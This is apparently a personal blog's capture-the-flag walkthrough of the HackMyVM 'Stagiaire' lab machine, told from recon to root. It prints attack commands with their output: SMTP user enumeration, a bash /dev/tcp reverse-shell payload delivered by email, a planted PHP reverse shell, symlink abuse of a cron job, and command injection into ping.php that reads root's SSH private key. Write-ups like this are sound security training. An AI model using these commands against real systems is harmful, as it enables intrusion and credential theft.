HackMyVM - Stagiaire

More of a stagger through than a walkthrough :(

sudo netdiscover -r 10.0.0.0/24

Kali: 10.0.0.10

Stagiaire: 10.0.0.31

nmap -T4 -p- -sC -sV -oN nmap.log 10.0.0.31

# Nmap 7.91 scan initiated Mon Nov 8 10:16:41 2021 as: nmap -T4 -p- -sC -sV -oN nmap.log 10.0.0.31
Nmap scan report for 10.0.0.31
Host is up (0.00076s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
| 256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
|_ 256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian.numericable.fr, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-23T15:24:56
|_Not valid after: 2031-10-21T15:24:56
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.51
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Protected area
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: 401 Unauthorized
Service Info: Hosts: debian.numericable.fr, stagiaire.hmv; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port22 - SSH
Port25 - SMTP
Port80 - Web

The web seems to be protected with a username and password.

Hunting down usernames with VRFY on SMTP seems like a reasonable idea but apart was actually not required.

Using name list from:
https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt

smtp-user-enum -M VRFY -U ./names.txt -t 10.0.0.31

So thats a start, we have root, madonna, tony
After a long time, I have discovered that the website password is not in rockyou.txt and can be considered strong and unbreakable... so now what ?

Time to rethink things.
GET is blocked, but what about POST?

┌──(kali㉿kali)-[~/stag]

└─$ curl http://10.0.0.31/index.php

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<title>401 Unauthorized</title>

</head><body>

<h1>Unauthorized</h1>

<p>This server could not verify that you

are authorized to access the document

requested. Either you supplied the wrong

credentials (e.g., bad password), or your

browser doesn't understand how to supply

the credentials required.</p>

<hr>

<address>Apache/2.4.51 (Debian) Server at 10.0.0.31 Port 80</address>

</body></html>

┌──(kali㉿kali)-[~/stag]

└─$ curl -X POST http://10.0.0.31/index.php

At last something, even if its only a jpg image.

└─$ curl -X POST http://10.0.0.31/madonna.jpg --output madonna.jpg 6 ⨯

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

100 127k 100 127k 0 0 15.5M 0 --:--:-- --:--:-- --:--:-- 15.5M

┌──(kali㉿kali)-[~/stag]

└─$ stegseek madonna.jpg /usr/share/wordlists/rockyou.txt

StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "freeze"

[i] Original filename: "info.txt".

[i] Extracting to "madonna.jpg.out".

┌──(kali㉿kali)-[~/stag]

└─$ cat madonna.jpg.out

Don't waste your time I hate CTFs lol

┌──(kali㉿kali)-[~/stag]

└─$ curl -X POST http://10.0.0.31/info.txt

/madonnasecretlife

Got an image and its got some extra secrets to point the way forward.
stegseek extracts a text file, but the website has different content in the same filename

Wordpress..

After scanning and looking for any exploits, hidden files or other bits I had to resort to reading the message that was clearly written on the page that tell you what to do next!
Checking mail every minute sounds like it may be automated....

on Kali:

Create a reverse shell payload and host it

└─$ cat rs.html
bash -i >& /dev/tcp/10.0.0.10/4444 0>&1
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Set a listener in another shell:

└─$ nc -nvlp 4444

listening on [any] 4444 ...

In yet another shell send a mail (quicker to just use telnet than remember any clever commands):
└─$ telnet 10.0.0.31 25
Trying 10.0.0.31...
Connected to 10.0.0.31.
Escape character is '^]'.
220 debian.numericable.fr ESMTP Postfix (Debian/GNU)
mail from: kali@kalibox.com
250 2.1.0 Ok
rcpt to: madonna@stagiaire.hmv
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: do you open a mail and run it
http://10.0.0.10:8000/rs.html

.
250 2.0.0 Ok: queued as 04CFB618EC

Bingo !

now there is a .ssh folder with keys so cat \ copy \ paste to kali and I can have a proper shell!

Escalate to Paillette

User paillette directory has a tetramin folder in it and www-data has group access.

there is a writable foleder in /var/www/html/labs

seems like a good place to put a reverse shell:

https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

copied and pasted to the server through the shell.

madonna can write a file there and then send a curl -X POST command to initiate it back to kali

Using www-data reverse shell

cd to /home/paillette/tetramin

there is an ssh folder with an id_rsa file but no rights to it but there is a .chmod file in the home directory,

create a symlink in tetramin folder to the key file.

ln -s ssh/id_rsa

Before I could try running the .chmod file the permissions just changed... seems to be on a cron job as Paillette and we can just read the file after a minute anyway!

$ ls -al

total 12

drwxrwxrwx 2 paillette paillette 4096 Oct 28 20:23 .

drwxrwx--- 3 paillette www-data 4096 Nov 11 12:36 ..

-rwxrwxrwx 1 paillette paillette 2610 Oct 28 20:22 id_rsa

$ cat id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----

ssh in as paillette

paillette@stagiaire:~$ sudo -l

Matching Defaults entries for paillette on stagiaire:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User paillette may run the following commands on stagiaire:

(tony) NOPASSWD: /usr/bin/compose

As I seem to be on a roll with id_rsa files lets try somthing simple....

paillette@stagiaire:~$ sudo -u tony /usr/bin/compose norun /home/tony/.ssh/id_rsa

ssh key opend in vim, select all, copy and paste into a file on kali
chmod 600 and ssh in as tony

tony@stagiaire:~$ sudo -l

Matching Defaults entries for tony on stagiaire:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tony may run the following commands on stagiaire:

(ALL : ALL) NOPASSWD: /bin/bash /srv/php_server

$ tony@stagiaire:~$ cat /srv/php_server

/usr/bin/php -S 127.0.0.1:8000 -t /opt

cant access /opt to see what is there :(

127.0.0.1:8000 isnt very friendly :(

Lets try and just run it as a user on its LAN ip and scan it from kali

/usr/bin/php -S 10.0.0.31:8000 -t /opt

┌──(kali㉿kali)-[~/stag]

└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -r -u http://10.0.0.31:8000/ -x php -o phpdev --no-error 1 ⚙

===============================================================

Gobuster v3.1.0

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url: http://10.0.0.31:8000/

[+] Method: GET

[+] Threads: 10

[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

[+] Negative Status codes: 404

[+] User Agent: gobuster/3.1.0

[+] Extensions: php

[+] Follow Redirect: true

[+] Timeout: 10s

===============================================================

2021/11/11 07:08:59 Starting gobuster in directory enumeration mode

===============================================================

/ping.php (Status: 200) [Size: 0]

Now have an endpoint, need to FUZZ the querystring\command

┌──(kali㉿kali)-[~/stag]

└─$ wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hh BBB http://10.0.0.31:8000/ping.php?FUZZ{test}=10.0.0.10 1 ⚙

/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************

* Wfuzz 3.1.0 - The Web Fuzzer *

********************************************************

Target: http://10.0.0.31:8000/ping.php?FUZZ=10.0.0.10

Total requests: 87664

=====================================================================

ID Response Lines Word Chars Payload

=====================================================================

000000001: 200 0 L 0 W 0 Ch "test"

000000939: 200 10 L 60 W 437 Ch "ip"

So a bit of playing and we have a possible way in:

└─$ curl http://10.0.0.31:8000/ping.php?ip=10.0.0.10 1 ⚙

<pre>PING 10.0.0.10 (10.0.0.10) 56(84) bytes of data.

64 bytes from 10.0.0.10: icmp_seq=1 ttl=64 time=0.313 ms

64 bytes from 10.0.0.10: icmp_seq=2 ttl=64 time=0.505 ms

64 bytes from 10.0.0.10: icmp_seq=3 ttl=64 time=0.440 ms

64 bytes from 10.0.0.10: icmp_seq=4 ttl=64 time=0.427 ms

--- 10.0.0.10 ping statistics ---

4 packets transmitted, 4 received, 0% packet loss, time 3055ms

rtt min/avg/max/mdev = 0.313/0.421/0.505/0.069 ms

</pre>

┌──(kali㉿kali)-[~/stag]

└─$ curl "http://10.0.0.31:8000/ping.php?ip=10.0.0.10|id" 1 ⚙

<pre>uid=1001(tony) gid=1001(tony) groups=1001(tony)

</pre>

So now I can run it with sudo and see if I can get a shell or find any ssh keys.

tony@stagiaire:~$ curl -G --data-urlencode 'ip=10.0.0.1;ls /root/.ssh/' http://127.0.0.1:8000/ping.php

<pre>PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.

64 bytes from 10.0.0.1: icmp_seq=1 ttl=255 time=0.213 ms

64 bytes from 10.0.0.1: icmp_seq=2 ttl=255 time=0.316 ms

64 bytes from 10.0.0.1: icmp_seq=3 ttl=255 time=0.329 ms

64 bytes from 10.0.0.1: icmp_seq=4 ttl=255 time=0.314 ms

--- 10.0.0.1 ping statistics ---

4 packets transmitted, 4 received, 0% packet loss, time 3074ms

rtt min/avg/max/mdev = 0.213/0.293/0.329/0.046 ms

authorized_keys

id_rsa

known_hosts

</pre>

tony@stagiaire:~$ curl -G --data-urlencode 'ip=10.0.0.1;cat /root/.ssh/id_rsa' http://127.0.0.1:8000/ping.php

<pre>PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.

64 bytes from 10.0.0.1: icmp_seq=1 ttl=255 time=0.268 ms

64 bytes from 10.0.0.1: icmp_seq=2 ttl=255 time=0.318 ms

64 bytes from 10.0.0.1: icmp_seq=3 ttl=255 time=0.346 ms

64 bytes from 10.0.0.1: icmp_seq=4 ttl=255 time=0.347 ms

--- 10.0.0.1 ping statistics ---

4 packets transmitted, 4 received, 0% packet loss, time 3049ms

rtt min/avg/max/mdev = 0.268/0.319/0.347/0.032 ms

-----BEGIN OPENSSH PRIVATE KEY-----

b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn

NhAAAAAwEAAQAAAYEAuaYh3JOr8cObrWXSTcuGLuJ/KmfvUBuy3NXDCXnlL2EPXmbK9uS6

TpAbQOr0G0jPswcQfs5/xpYTPzaQY69Va9G+0tnair+0ZxYNRUKBGE+wu+AqNRnwhTh0bH

got the root ssh key so just copy, paste, chmod 600 and connect.

Search This Blog

Tinkering in the shed.